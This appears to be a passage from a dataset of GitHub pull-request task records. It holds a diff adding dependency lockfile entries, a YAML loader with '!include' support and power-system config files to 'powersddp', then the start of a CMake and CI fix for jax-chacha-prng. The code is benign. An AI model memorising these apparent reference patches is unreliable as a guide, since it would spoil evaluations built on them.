+ {file = "PyYAML-5.4.1-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:8c1be557ee92a20f184922c7b6424e8ab6691788e6d86137c5d93c1a6ec1b8fb"},
+ {file = "PyYAML-5.4.1-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:fd7f6999a8070df521b6384004ef42833b9bd62cfee11a09bda1079b4b704247"},
+ {file = "PyYAML-5.4.1-cp38-cp38-manylinux2014_s390x.whl", hash = "sha256:bfb51918d4ff3d77c1c856a9699f8492c612cde32fd3bcd344af9be34999bfdc"},
+ {file = "PyYAML-5.4.1-cp38-cp38-win32.whl", hash = "sha256:fa5ae20527d8e831e8230cbffd9f8fe952815b2b7dae6ffec25318803a7528fc"},
+ {file = "PyYAML-5.4.1-cp38-cp38-win_amd64.whl", hash = "sha256:0f5f5786c0e09baddcd8b4b45f20a7b5d61a7e7e99846e3c799b05c7c53fa696"},
+ {file = "PyYAML-5.4.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:294db365efa064d00b8d1ef65d8ea2c3426ac366c0c4368d930bf1c5fb497f77"},
+ {file = "PyYAML-5.4.1-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:74c1485f7707cf707a7aef42ef6322b8f97921bd89be2ab6317fd782c2d53183"},
+ {file = "PyYAML-5.4.1-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:d483ad4e639292c90170eb6f7783ad19490e7a8defb3e46f97dfe4bacae89122"},
+ {file = "PyYAML-5.4.1-cp39-cp39-manylinux2014_s390x.whl", hash = "sha256:fdc842473cd33f45ff6bce46aea678a54e3d21f1b61a7750ce3c498eedfe25d6"},
+ {file = "PyYAML-5.4.1-cp39-cp39-win32.whl", hash = "sha256:49d4cdd9065b9b6e206d0595fee27a96b5dd22618e7520c33204a4a3239d5b10"},
+ {file = "PyYAML-5.4.1-cp39-cp39-win_amd64.whl", hash = "sha256:c20cfa2d49991c8b4147af39859b167664f2ad4561704ee74c1de03318e898db"},
+ {file = "PyYAML-5.4.1.tar.gz", hash = "sha256:607774cbba28732bfa802b54baa7484215f530991055bb562efbed5b2f20a45e"},
+]
+pyzmq = [
+ {file = "pyzmq-22.2.1-cp310-cp310-macosx_10_15_universal2.whl", hash = "sha256:d60a407663b7c2af781ab7f49d94a3d379dd148bb69ea8d9dd5bc69adf18097c"},
+ {file = "pyzmq-22.2.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:631f932fb1fa4b76f31adf976f8056519bc6208a3c24c184581c3dd5be15066e"},
+ {file = "pyzmq-22.2.1-cp310-cp310-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:0471d634c7fe48ff7d3849798da6c16afc71676dd890b5ae08eb1efe735c6fec"},
+ {file = "pyzmq-22.2.1-cp310-cp310-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:f520e9fee5d7a2e09b051d924f85b977c6b4e224e56c0551c3c241bbeeb0ad8d"},
+ {file = "pyzmq-22.2.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c1b6619ceb33a8907f1cb82ff8afc8a133e7a5f16df29528e919734718600426"},
+ {file = "pyzmq-22.2.1-cp310-cp310-win32.whl", hash = "sha256:31c5dfb6df5148789835128768c01bf6402eb753d06f524f12f6786caf96fb44"},
+ {file = "pyzmq-22.2.1-cp310-cp310-win_amd64.whl", hash = "sha256:4842a8263cbaba6fce401bbe4e2b125321c401a01714e42624dabc554bfc2629"},
+ {file = "pyzmq-22.2.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:b921758f8b5098faa85f341bbdd5e36d5339de5e9032ca2b07d8c8e7bec5069b"},
+ {file = "pyzmq-22.2.1-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:240b83b3a8175b2f616f80092cbb019fcd5c18598f78ffc6aa0ae9034b300f14"},
+ {file = "pyzmq-22.2.1-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:da7f7f3bb08bcf59a6b60b4e53dd8f08bb00c9e61045319d825a906dbb3c8fb7"},
+ {file = "pyzmq-22.2.1-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:e66025b64c4724ba683d6d4a4e5ee23de12fe9ae683908f0c7f0f91b4a2fd94e"},
+ {file = "pyzmq-22.2.1-cp36-cp36m-win32.whl", hash = "sha256:50d007d5702171bc810c1e74498fa2c7bc5b50f9750697f7fd2a3e71a25aad91"},
+ {file = "pyzmq-22.2.1-cp36-cp36m-win_amd64.whl", hash = "sha256:b4a51c7d906dc263a0cc5590761e53e0a68f2c2fefe549cbef21c9ee5d2d98a4"},
+ {file = "pyzmq-22.2.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:93705cb90baa9d6f75e8448861a1efd3329006f79095ab18846bd1eaa342f7c3"},
+ {file = "pyzmq-22.2.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:620b0abb813958cb3ecb5144c177e26cde92fee6f43c4b9de6b329515532bf27"},
+ {file = "pyzmq-22.2.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:2dd3896b3c952cf6c8013deda53c1df16bf962f355b5503d23521e0f6403ae3d"},
+ {file = "pyzmq-22.2.1-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:6e9c030222893afa86881d7485d3e841969760a16004bd23e9a83cca28b42778"},
+ {file = "pyzmq-22.2.1-cp37-cp37m-win32.whl", hash = "sha256:262f470e7acde18b7217aac78d19d2e29ced91a5afbeb7d98521ebf26461aa7e"},
+ {file = "pyzmq-22.2.1-cp37-cp37m-win_amd64.whl", hash = "sha256:246f27b88722cfa729bb04881e94484e40b085720d728c1b05133b3f331b0b7b"},
+ {file = "pyzmq-22.2.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:0d17bac19e934e9f547a8811b7c2a32651a7840f38086b924e2e3dcb2fae5c3a"},
+ {file = "pyzmq-22.2.1-cp38-cp38-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:5933d1f4087de6e52906f72d92e1e4dcc630d371860b92c55d7f7a4b815a664c"},
+ {file = "pyzmq-22.2.1-cp38-cp38-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:ac4497e4b7d134ee53ce5532d9cc3b640d6e71806a55062984e0c99a2f88f465"},
+ {file = "pyzmq-22.2.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:66375a6094af72a6098ed4403b15b4db6bf00013c6febc1baa832e7abda827f4"},
+ {file = "pyzmq-22.2.1-cp38-cp38-win32.whl", hash = "sha256:b2c16d20bd0aef8e57bc9505fdd80ea0d6008020c3740accd96acf1b3d1b5347"},
+ {file = "pyzmq-22.2.1-cp38-cp38-win_amd64.whl", hash = "sha256:ff345d48940c834168f81fa1d4724675099f148f1ab6369748c4d712ed71bf7c"},
+ {file = "pyzmq-22.2.1-cp39-cp39-macosx_10_15_universal2.whl", hash = "sha256:f5c84c5de9a773bbf8b22c51e28380999ea72e5e85b4db8edf5e69a7a0d4d9f9"},
+ {file = "pyzmq-22.2.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:2534a036b777f957bd6b89b55fb2136775ca2659fb0f1c85036ba78d17d86fd5"},
+ {file = "pyzmq-22.2.1-cp39-cp39-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:a649065413ba4eab92a783a7caa4de8ce14cf46ba8a2a09951426143f1298adb"},
+ {file = "pyzmq-22.2.1-cp39-cp39-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:c9cb0bd3a3cb7ccad3caa1d7b0d18ba71ed3a4a3610028e506a4084371d4d223"},
+ {file = "pyzmq-22.2.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b4428302c389fffc0c9c07a78cad5376636b9d096f332acfe66b321ae9ff2c63"},
+ {file = "pyzmq-22.2.1-cp39-cp39-win32.whl", hash = "sha256:6a5b4566f66d953601d0d47d4071897f550a265bafd52ebcad5ac7aad3838cbb"},
+ {file = "pyzmq-22.2.1-cp39-cp39-win_amd64.whl", hash = "sha256:89200ab6ef9081c72a04ed84c52a50b60dcb0655375aeedb40689bc7c934715e"},
+ {file = "pyzmq-22.2.1-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:ed67df4eaa99a20d162d76655bda23160abdf8abf82a17f41dfd3962e608dbcc"},
+ {file = "pyzmq-22.2.1-pp37-pypy37_pp73-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:021e22a8c58ab294bd4b96448a2ca4e716e1d76600192ff84c33d71edb1fbd37"},
+ {file = "pyzmq-22.2.1-pp37-pypy37_pp73-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:200ac096cee5499964c90687306a7244b79ef891f773ed4cf15019fd1f3df330"},
+ {file = "pyzmq-22.2.1-pp37-pypy37_pp73-win_amd64.whl", hash = "sha256:b3f57bee62e36be5c97712de32237c5589caee0d1154c2ad01a888accfae20bc"},
+ {file = "pyzmq-22.2.1.tar.gz", hash = "sha256:6d18c76676771fd891ca8e0e68da0bbfb88e30129835c0ade748016adb3b6242"},
+]
regex = [
{file = "regex-2021.8.3-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:8764a78c5464ac6bde91a8c87dd718c27c1cabb7ed2b4beaf36d3e8e390567f9"},
{file = "regex-2021.8.3-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4551728b767f35f86b8e5ec19a363df87450c7376d7419c3cac5b9ceb4bce576"},
@@ -437,6 +1749,34 @@ regex = [
{file = "regex-2021.8.3-cp39-cp39-win_amd64.whl", hash = "sha256:bfa6a679410b394600eafd16336b2ce8de43e9b13f7fb9247d84ef5ad2b45e91"},
{file = "regex-2021.8.3.tar.gz", hash = "sha256:8935937dad2c9b369c3d932b0edbc52a62647c2afb2fafc0c280f14a8bf56a6a"},
]
+requests = [
+ {file = "requests-2.26.0-py2.py3-none-any.whl", hash = "sha256:6c1246513ecd5ecd4528a0906f910e8f0f9c6b8ec72030dc9fd154dc1a6efd24"},
+ {file = "requests-2.26.0.tar.gz", hash = "sha256:b8aa58f8cf793ffd8782d3d8cb19e66ef36f7aba4353eec859e74678b01b07a7"},
+]
+requests-unixsocket = [
+ {file = "requests-unixsocket-0.2.0.tar.gz", hash = "sha256:9e5c1a20afc3cf786197ae59c79bcdb0e7565f218f27df5f891307ee8817c1ea"},
+ {file = "requests_unixsocket-0.2.0-py2.py3-none-any.whl", hash = "sha256:014d07bfb66dc805a011a8b4b306cf4ec96d2eddb589f6b2b5765e626f0dc0cc"},
+]
+send2trash = [
+ {file = "Send2Trash-1.8.0-py3-none-any.whl", hash = "sha256:f20eaadfdb517eaca5ce077640cb261c7d2698385a6a0f072a4a5447fd49fa08"},
+ {file = "Send2Trash-1.8.0.tar.gz", hash = "sha256:d2c24762fd3759860a0aff155e45871447ea58d2be6bdd39b5c8f966a0c99c2d"},
+]
+six = [
+ {file = "six-1.16.0-py2.py3-none-any.whl", hash = "sha256:8abb2f1d86890a2dfb989f9a77cfcfd3e47c2a354b01111771326f8aa26e0254"},
+ {file = "six-1.16.0.tar.gz", hash = "sha256:1e61c37477a1626458e36f7b1d82aa5c9b094fa4802892072e49de9c60c4c926"},
+]
+sniffio = [
+ {file = "sniffio-1.2.0-py3-none-any.whl", hash = "sha256:471b71698eac1c2112a40ce2752bb2f4a4814c22a54a3eed3676bc0f5ca9f663"},
+ {file = "sniffio-1.2.0.tar.gz", hash = "sha256:c4666eecec1d3f50960c6bdf61ab7bc350648da6c126e3cf6898d8cd4ddcd3de"},
+]
+terminado = [
+ {file = "terminado-0.11.0-py3-none-any.whl", hash = "sha256:221eef83e6a504894842f7dccfa971ca2e98ec22a8a9118577e5257527674b42"},
+ {file = "terminado-0.11.0.tar.gz", hash = "sha256:1e01183885f64c1bba3cf89a5a995ad4acfed4e5f00aebcce1bf7f089b0825a1"},
+]
+testpath = [
+ {file = "testpath-0.5.0-py3-none-any.whl", hash = "sha256:8044f9a0bab6567fc644a3593164e872543bb44225b0e24846e2c89237937589"},
+ {file = "testpath-0.5.0.tar.gz", hash = "sha256:1acf7a0bcd3004ae8357409fc33751e16d37ccc650921da1094a86581ad1e417"},
+]
toml = [
{file = "toml-0.10.2-py2.py3-none-any.whl", hash = "sha256:806143ae5bfb6a3c6e736a764057db0e6a0e05e338b5630894a5f779cabb4f9b"},
{file = "toml-0.10.2.tar.gz", hash = "sha256:b3bda1d108d5dd99f4a20d24d9c348e91c4db7ab1b749200bded2f839ccbe68f"},
@@ -445,15 +1785,78 @@ tomli = [
{file = "tomli-1.2.1-py3-none-any.whl", hash = "sha256:8dd0e9524d6f386271a36b41dbf6c57d8e32fd96fd22b6584679dc569d20899f"},
{file = "tomli-1.2.1.tar.gz", hash = "sha256:a5b75cb6f3968abb47af1b40c1819dc519ea82bcc065776a866e8d74c5ca9442"},
]
+tornado = [
+ {file = "tornado-6.1-cp35-cp35m-macosx_10_9_x86_64.whl", hash = "sha256:d371e811d6b156d82aa5f9a4e08b58debf97c302a35714f6f45e35139c332e32"},
+ {file = "tornado-6.1-cp35-cp35m-manylinux1_i686.whl", hash = "sha256:0d321a39c36e5f2c4ff12b4ed58d41390460f798422c4504e09eb5678e09998c"},
+ {file = "tornado-6.1-cp35-cp35m-manylinux1_x86_64.whl", hash = "sha256:9de9e5188a782be6b1ce866e8a51bc76a0fbaa0e16613823fc38e4fc2556ad05"},
+ {file = "tornado-6.1-cp35-cp35m-manylinux2010_i686.whl", hash = "sha256:61b32d06ae8a036a6607805e6720ef00a3c98207038444ba7fd3d169cd998910"},
+ {file = "tornado-6.1-cp35-cp35m-manylinux2010_x86_64.whl", hash = "sha256:3e63498f680547ed24d2c71e6497f24bca791aca2fe116dbc2bd0ac7f191691b"},
+ {file = "tornado-6.1-cp35-cp35m-manylinux2014_aarch64.whl", hash = "sha256:6c77c9937962577a6a76917845d06af6ab9197702a42e1346d8ae2e76b5e3675"},
+ {file = "tornado-6.1-cp35-cp35m-win32.whl", hash = "sha256:6286efab1ed6e74b7028327365cf7346b1d777d63ab30e21a0f4d5b275fc17d5"},
+ {file = "tornado-6.1-cp35-cp35m-win_amd64.whl", hash = "sha256:fa2ba70284fa42c2a5ecb35e322e68823288a4251f9ba9cc77be04ae15eada68"},
+ {file = "tornado-6.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:0a00ff4561e2929a2c37ce706cb8233b7907e0cdc22eab98888aca5dd3775feb"},
+ {file = "tornado-6.1-cp36-cp36m-manylinux1_i686.whl", hash = "sha256:748290bf9112b581c525e6e6d3820621ff020ed95af6f17fedef416b27ed564c"},
+ {file = "tornado-6.1-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:e385b637ac3acaae8022e7e47dfa7b83d3620e432e3ecb9a3f7f58f150e50921"},
+ {file = "tornado-6.1-cp36-cp36m-manylinux2010_i686.whl", hash = "sha256:25ad220258349a12ae87ede08a7b04aca51237721f63b1808d39bdb4b2164558"},
+ {file = "tornado-6.1-cp36-cp36m-manylinux2010_x86_64.whl", hash = "sha256:65d98939f1a2e74b58839f8c4dab3b6b3c1ce84972ae712be02845e65391ac7c"},
+ {file = "tornado-6.1-cp36-cp36m-manylinux2014_aarch64.whl", hash = "sha256:e519d64089b0876c7b467274468709dadf11e41d65f63bba207e04217f47c085"},
+ {file = "tornado-6.1-cp36-cp36m-win32.whl", hash = "sha256:b87936fd2c317b6ee08a5741ea06b9d11a6074ef4cc42e031bc6403f82a32575"},
+ {file = "tornado-6.1-cp36-cp36m-win_amd64.whl", hash = "sha256:cc0ee35043162abbf717b7df924597ade8e5395e7b66d18270116f8745ceb795"},
+ {file = "tornado-6.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:7250a3fa399f08ec9cb3f7b1b987955d17e044f1ade821b32e5f435130250d7f"},
+ {file = "tornado-6.1-cp37-cp37m-manylinux1_i686.whl", hash = "sha256:ed3ad863b1b40cd1d4bd21e7498329ccaece75db5a5bf58cd3c9f130843e7102"},
+ {file = "tornado-6.1-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:dcef026f608f678c118779cd6591c8af6e9b4155c44e0d1bc0c87c036fb8c8c4"},
+ {file = "tornado-6.1-cp37-cp37m-manylinux2010_i686.whl", hash = "sha256:70dec29e8ac485dbf57481baee40781c63e381bebea080991893cd297742b8fd"},
+ {file = "tornado-6.1-cp37-cp37m-manylinux2010_x86_64.whl", hash = "sha256:d3f7594930c423fd9f5d1a76bee85a2c36fd8b4b16921cae7e965f22575e9c01"},
+ {file = "tornado-6.1-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:3447475585bae2e77ecb832fc0300c3695516a47d46cefa0528181a34c5b9d3d"},
+ {file = "tornado-6.1-cp37-cp37m-win32.whl", hash = "sha256:e7229e60ac41a1202444497ddde70a48d33909e484f96eb0da9baf8dc68541df"},
+ {file = "tornado-6.1-cp37-cp37m-win_amd64.whl", hash = "sha256:cb5ec8eead331e3bb4ce8066cf06d2dfef1bfb1b2a73082dfe8a161301b76e37"},
+ {file = "tornado-6.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:20241b3cb4f425e971cb0a8e4ffc9b0a861530ae3c52f2b0434e6c1b57e9fd95"},
+ {file = "tornado-6.1-cp38-cp38-manylinux1_i686.whl", hash = "sha256:c77da1263aa361938476f04c4b6c8916001b90b2c2fdd92d8d535e1af48fba5a"},
+ {file = "tornado-6.1-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:fba85b6cd9c39be262fcd23865652920832b61583de2a2ca907dbd8e8a8c81e5"},
+ {file = "tornado-6.1-cp38-cp38-manylinux2010_i686.whl", hash = "sha256:1e8225a1070cd8eec59a996c43229fe8f95689cb16e552d130b9793cb570a288"},
+ {file = "tornado-6.1-cp38-cp38-manylinux2010_x86_64.whl", hash = "sha256:d14d30e7f46a0476efb0deb5b61343b1526f73ebb5ed84f23dc794bdb88f9d9f"},
+ {file = "tornado-6.1-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:8f959b26f2634a091bb42241c3ed8d3cedb506e7c27b8dd5c7b9f745318ddbb6"},
+ {file = "tornado-6.1-cp38-cp38-win32.whl", hash = "sha256:34ca2dac9e4d7afb0bed4677512e36a52f09caa6fded70b4e3e1c89dbd92c326"},
+ {file = "tornado-6.1-cp38-cp38-win_amd64.whl", hash = "sha256:6196a5c39286cc37c024cd78834fb9345e464525d8991c21e908cc046d1cc02c"},
+ {file = "tornado-6.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:f0ba29bafd8e7e22920567ce0d232c26d4d47c8b5cf4ed7b562b5db39fa199c5"},
+ {file = "tornado-6.1-cp39-cp39-manylinux1_i686.whl", hash = "sha256:33892118b165401f291070100d6d09359ca74addda679b60390b09f8ef325ffe"},
+ {file = "tornado-6.1-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:7da13da6f985aab7f6f28debab00c67ff9cbacd588e8477034c0652ac141feea"},
+ {file = "tornado-6.1-cp39-cp39-manylinux2010_i686.whl", hash = "sha256:e0791ac58d91ac58f694d8d2957884df8e4e2f6687cdf367ef7eb7497f79eaa2"},
+ {file = "tornado-6.1-cp39-cp39-manylinux2010_x86_64.whl", hash = "sha256:66324e4e1beede9ac79e60f88de548da58b1f8ab4b2f1354d8375774f997e6c0"},
+ {file = "tornado-6.1-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:a48900ecea1cbb71b8c71c620dee15b62f85f7c14189bdeee54966fbd9a0c5bd"},
+ {file = "tornado-6.1-cp39-cp39-win32.whl", hash = "sha256:d3d20ea5782ba63ed13bc2b8c291a053c8d807a8fa927d941bd718468f7b950c"},
+ {file = "tornado-6.1-cp39-cp39-win_amd64.whl", hash = "sha256:548430be2740e327b3fe0201abe471f314741efcb0067ec4f2d7dcfb4825f3e4"},
+ {file = "tornado-6.1.tar.gz", hash = "sha256:33c6e81d7bd55b468d2e793517c909b139960b6c790a60b7991b9b6b76fb9791"},
+]
+traitlets = [
+ {file = "traitlets-5.0.5-py3-none-any.whl", hash = "sha256:69ff3f9d5351f31a7ad80443c2674b7099df13cc41fc5fa6e2f6d3b0330b0426"},
+ {file = "traitlets-5.0.5.tar.gz", hash = "sha256:178f4ce988f69189f7e523337a3e11d91c786ded9360174a3d9ca83e79bc5396"},
+]
+types-pyyaml = [
+ {file = "types-PyYAML-5.4.6.tar.gz", hash = "sha256:745dcb4b1522423026bcc83abb9925fba747f1e8602d902f71a4058f9e7fb662"},
+ {file = "types_PyYAML-5.4.6-py3-none-any.whl", hash = "sha256:96f8d3d96aa1a18a465e8f6a220e02cff2f52632314845a364ecbacb0aea6e30"},
+]
typing-extensions = [
{file = "typing_extensions-3.10.0.0-py2-none-any.whl", hash = "sha256:0ac0f89795dd19de6b97debb0c6af1c70987fd80a2d62d1958f7e56fcc31b497"},
{file = "typing_extensions-3.10.0.0-py3-none-any.whl", hash = "sha256:779383f6086d90c99ae41cf0ff39aac8a7937a9283ce0a414e5dd782f4c94a84"},
{file = "typing_extensions-3.10.0.0.tar.gz", hash = "sha256:50b6f157849174217d0656f99dc82fe932884fb250826c18350e159ec6cdf342"},
]
+urllib3 = [
+ {file = "urllib3-1.26.6-py2.py3-none-any.whl", hash = "sha256:39fb8672126159acb139a7718dd10806104dec1e2f0f6c88aab05d17df10c8d4"},
+ {file = "urllib3-1.26.6.tar.gz", hash = "sha256:f57b4c16c62fa2760b7e3d97c35b255512fb6b59a259730f36ba32ce9f8e342f"},
+]
wcwidth = [
{file = "wcwidth-0.2.5-py2.py3-none-any.whl", hash = "sha256:beb4802a9cebb9144e99086eff703a642a13d6a0052920003a230f3294bbe784"},
{file = "wcwidth-0.2.5.tar.gz", hash = "sha256:c4d647b99872929fdb7bdcaa4fbe7f01413ed3d98077df798530e5b04f116c83"},
]
+webencodings = [
+ {file = "webencodings-0.5.1-py2.py3-none-any.whl", hash = "sha256:a0af1213f3c2226497a97e2b3aa01a7e4bee4f403f95be16fc9acd2947514a78"},
+ {file = "webencodings-0.5.1.tar.gz", hash = "sha256:b36a1c245f2d304965eb4e0a82848379241dc04b865afcc4aab16748587e1923"},
+]
+websocket-client = [
+ {file = "websocket-client-1.2.1.tar.gz", hash = "sha256:8dfb715d8a992f5712fff8c843adae94e22b22a99b2c5e6b0ec4a1a981cc4e0d"},
+ {file = "websocket_client-1.2.1-py2.py3-none-any.whl", hash = "sha256:0133d2f784858e59959ce82ddac316634229da55b498aac311f1620567a710ec"},
+]
wrapt = [
{file = "wrapt-1.12.1.tar.gz", hash = "sha256:b62ffa81fb85f4332a4f609cab4ac40709470da05643a082ec1eb88e6d9b97d7"},
]
diff --git a/powersddp/__init__.py b/powersddp/__init__.py
index 3dc1f76..a60e765 100644
--- a/powersddp/__init__.py
+++ b/powersddp/__init__.py
@@ -1,1 +1,1 @@
-__version__ = "0.1.0"
+from powersddp.core.api import PowerSystem
diff --git a/powersddp/core/__init__.py b/powersddp/core/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/powersddp/core/api.py b/powersddp/core/api.py
new file mode 100644
index 0000000..d33db35
--- /dev/null
+++ b/powersddp/core/api.py
@@ -0,0 +1,1 @@
+from powersddp.core.system import PowerSystem
diff --git a/powersddp/core/system.py b/powersddp/core/system.py
new file mode 100644
index 0000000..d8e72df
--- /dev/null
+++ b/powersddp/core/system.py
@@ -0,0 +1,59 @@
+"""Module to handle classes and methods related to a selected Power System.
+This module should follow a systems.json file standar:
+{
+ "{name}": {
+ "shedding_cost": float,
+ "load": [float, float, float],
+ "n_disc": int,
+ "n_est": int,
+ "n_cen": int,
+ "generation_units": [
+ {"type": "hydro",
+ "name": "str",
+ "v_max": float,
+ "v_min": float,
+ "prod": float,
+ "flow_max": float,
+ "inflow_scenarios":[<list>]},
+ {"type": "thermal", "name": "str", "capacity": "float", "cost": float},
+ ...
+ ]
+ }
+}
+Where {name} should be changed to whatever name you may choose to your system.
+For example, 'Test01'. Check README.md file.
+"""
+
+from abc import ABC, abstractclassmethod
+import yaml
+
+from powersddp.util._yml import YmlLoader
+
+YmlLoader.add_constructor("!include", YmlLoader.include)
+
+
+class PowerSystemInterface(ABC):
+ @abstractclassmethod
+ def load_system(self):
+ raise NotImplementedError
+
+
+class PowerSystem(PowerSystemInterface):
+ def __init__(self, verbose: bool = False, **kwargs):
+ self.__verbose = verbose
+ self.__dict__.update(kwargs)
+ self.load_system()
+
+ def load_system(self):
+ if "path" in self.__dict__:
+ with open(self.path, "r") as f:
+ data = yaml.load(f, YmlLoader)
+
+ self.data = data
+ if self.__verbose:
+ print("System loaded from {} file".format(self.path))
+ elif "data" in self.__dict__:
+ if self.__verbose:
+ print("System loaded from 'data' payload")
+ else:
+ raise NotImplementedError
diff --git a/powersddp/util/__init__.py b/powersddp/util/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/powersddp/util/_yml.py b/powersddp/util/_yml.py
new file mode 100644
index 0000000..b0b21b8
--- /dev/null
+++ b/powersddp/util/_yml.py
@@ -0,0 +1,17 @@
+import yaml
+import os
+
+
+class YmlLoader(yaml.SafeLoader):
+ def __init__(self, stream):
+
+ self._root = os.path.split(stream.name)[0]
+
+ super(YmlLoader, self).__init__(stream)
+
+ def include(self, node):
+
+ filename = os.path.join(self._root, self.construct_scalar(node))
+
+ with open(filename, "r") as f:
+ return yaml.load(f, YmlLoader)
diff --git a/pyproject.toml b/pyproject.toml
index 6334502..31928aa 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -10,12 +10,16 @@ exclude = ["Makefile","README.rst","Notebook.ipynb"]
[tool.poetry.dependencies]
python = "^3.8"
+PyYAML = "^5.4.1"
+cvxopt = "^1.2.6"
[tool.poetry.dev-dependencies]
pytest = "^5.2"
black = "^21.7b0"
pylint = "^2.9.6"
mypy = "^0.910"
+jupyterlab = "^3.1.6"
+types-PyYAML = "^5.4.6"
[tool.black]
line-length = 88
diff --git a/system-hydro.yml b/system-hydro.yml
new file mode 100644
index 0000000..840a01d
--- /dev/null
+++ b/system-hydro.yml
@@ -0,0 +1,10 @@
+-
+ name: HU1
+ v_max: 100
+ v_min: 20
+ prod: 0.95
+ flow_max: 60
+ inflow_scenarios:
+ - [23,16]
+ - [19,14]
+ - [15,11]
\ No newline at end of file
diff --git a/system-thermal.yml b/system-thermal.yml
new file mode 100644
index 0000000..7dd685b
--- /dev/null
+++ b/system-thermal.yml
@@ -0,0 +1,8 @@
+-
+ name: GT1
+ capacity: 15
+ cost: 10
+-
+ name: GT2
+ capacity: 10
+ cost: 25
\ No newline at end of file
diff --git a/system.yml b/system.yml
new file mode 100644
index 0000000..26373dd
--- /dev/null
+++ b/system.yml
@@ -0,0 +1,7 @@
+load: [50,50,50]
+discretizations: 3
+stages: 3
+scenarios: 2
+outage_cost: 500
+hydro-units: !include system-hydro.yml
+thermal-units: !include system-thermal.yml
\ No newline at end of file
| System being loaded from both file or payload dictionary
## Description
- First Feature completed
- `System.dispach()` already in progress
- `Readme.md` documented
- Methods documentation lagging behind
| 2021-08-15T03:30:35 | 0.0 | [] | [] |
|||
DPBayes/jax-chacha-prng | DPBayes__jax-chacha-prng-9 | 42bf98c43624280bc35016227dd4035e89bc1e41 | diff --git a/.github/workflows/build_wheels.yml b/.github/workflows/build_wheels.yml
index 102c824..573fe09 100644
--- a/.github/workflows/build_wheels.yml
+++ b/.github/workflows/build_wheels.yml
@@ -38,7 +38,7 @@ jobs:
sudo apt-get update
sudo apt-get install gcc-${{ matrix.cuda-setup[2] }} g++-${{ matrix.cuda-setup[2] }}
sudo ln -sf /usr/bin/gcc-${{ matrix.cuda-setup[2] }} /usr/bin/gcc
- sudo ln -sf /usr/bin/g++-${{ matrix.cuda-setup[2] }} /usr/bin/gcc
+ sudo ln -sf /usr/bin/g++-${{ matrix.cuda-setup[2] }} /usr/bin/g++
- name: Set up CUDA-Toolkit ${{ matrix.cuda-setup[0] }}
run: |
wget -q -O installer.run ${{ matrix.cuda-setup[1] }}
diff --git a/CMakeLists.txt b/CMakeLists.txt
index 4b0fa09..07bb7ab 100644
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -1,13 +1,77 @@
# SPDX-License-Identifier: Apache-2.0
-# SPDX-FileCopyrightText: © 2021 Aalto University
+# SPDX-FileCopyrightText: © 2022 Aalto University
cmake_minimum_required(VERSION 3.18)
project(jax-chacha20-prng LANGUAGES CXX)
option(BUILD_TESTING "Build tests for native kernels" OFF)
+option(FORCE_GENERIC "Build without CPU architecture optimized instructions" OFF)
set(CMAKE_CXX_STANDARD 14)
-add_compile_options($<$<COMPILE_LANGUAGE:CXX>:-msse>)
+set(cpu_arch_path "${CMAKE_CURRENT_LIST_DIR}/lib/generic/")
+set(cpu_arch_def "ARCH_GENERIC")
+set(SSE_ENABLED "No")
+set(NEON_ENABLED "No")
+
+if(NOT FORCE_GENERIC)
+ try_run(SSE_RUN_SUCCESS SSE_COMPILE_SUCCESS
+ ${CMAKE_CURRENT_BINARY_DIR} ${CMAKE_CURRENT_SOURCE_DIR}/cmake_config/sse_test.cpp
+ #WORKING_DIRECTORY ${CMAKE_CURRENT_LIST_DIR}/cmake_config/
+ )
+
+ if (NOT SSE_COMPILE_SUCCESS)
+ # could not compile sse intrinsics, maybe we need the compiler flag?
+ try_run(SSE_RUN_SUCCESS SSE_COMPILE_SUCCESS
